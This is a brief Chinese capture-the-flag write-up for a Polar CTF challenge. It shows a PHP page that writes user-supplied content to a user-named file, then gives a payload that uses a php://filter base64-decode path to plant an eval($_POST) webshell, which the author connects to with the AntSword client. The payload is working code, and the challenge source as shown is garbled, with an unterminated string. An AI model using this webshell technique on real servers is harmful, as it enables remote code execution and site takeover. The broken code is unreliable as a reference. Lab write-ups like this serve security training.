polar CTF 写shell

一、题目

<?php
/*

PolarD&N CTF

*/

highlight_file(__FILE__);

file_put_contents($_GET['filename'],".$_POST['content']);

?>

二、解题
payload

?filename=php://filter/convert.base64-decode/resource=shell.php
#
content=aPD89QGV2YWwoJF9QT1NUWzFdKTs/Pg== 

然后访问/shell.php发现木马被读入,用蚁剑连接

polar CTF 写shell_第1张图片

你可能感兴趣的:(CTF,web安全)